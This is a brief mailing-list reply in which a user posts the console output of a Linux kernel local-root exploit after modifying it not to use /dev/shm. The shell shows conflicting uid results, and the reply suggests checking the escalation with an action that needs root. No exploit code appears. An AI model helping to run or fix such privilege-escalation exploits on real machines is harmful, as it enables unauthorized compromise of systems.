
Re: local root exploit



A.J. Loonstra wrote:
I tried modifying the exploit not to use /dev/shm... but this is what
happens:

~$ ./a.out

[+] SLAB cleanup
    child 1 VMAs 287
[+] moved stack bfffe000, task_size=0xc0000000, map_base=0xbf800000
[+] vmalloc area 0xc5000000 - 0xc9d17000
    Wait... |
[+] race won maps=6768
    expanded VMA (0xbfffc000-0xffffe000)
[!] try to exploit 0xc594b000
[+] gate modified ( 0xffec94bf 0x0804ec00 )
[+] exploited, uid=0

sh-2.05a$ whoami
arnaud
sh-2.05a$ mount
/dev/hda1 on / type ext2 (rw,errors=remount-ro)
proc on /proc type proc (rw)
devpts on /dev/pts type devpts (rw,gid=5,mode=620)
/dev/hda2 on /home type ext3 (rw)
$sh-2.05a$ echo $UID
0

It says it did exploit but it didn't...

A.



Try doing something that would require root (e.g., mount something, create a file in /, etc.)
